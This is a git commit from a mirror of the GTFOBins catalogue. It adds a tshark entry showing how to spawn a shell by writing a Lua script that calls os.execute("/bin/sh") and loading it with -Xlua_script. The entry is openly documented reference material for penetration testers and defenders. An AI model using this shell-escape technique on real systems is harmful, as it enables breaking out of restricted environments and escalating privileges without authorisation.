mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Add tshark shell
This commit is contained in:
parent
1405b4dce5
commit
ff4e89470d
9
_gtfobins/tshark.md
Normal file
9
_gtfobins/tshark.md
Normal file
@ -0,0 +1,9 @@
|
|||||||
|
---
|
||||||
|
description: This program is able to execute [`lua`](/gtfobins/less/) code.
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
TF=$(mktemp)
|
||||||
|
echo 'os.execute("/bin/sh")' >$TF
|
||||||
|
tshark -Xlua_script:$TF
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user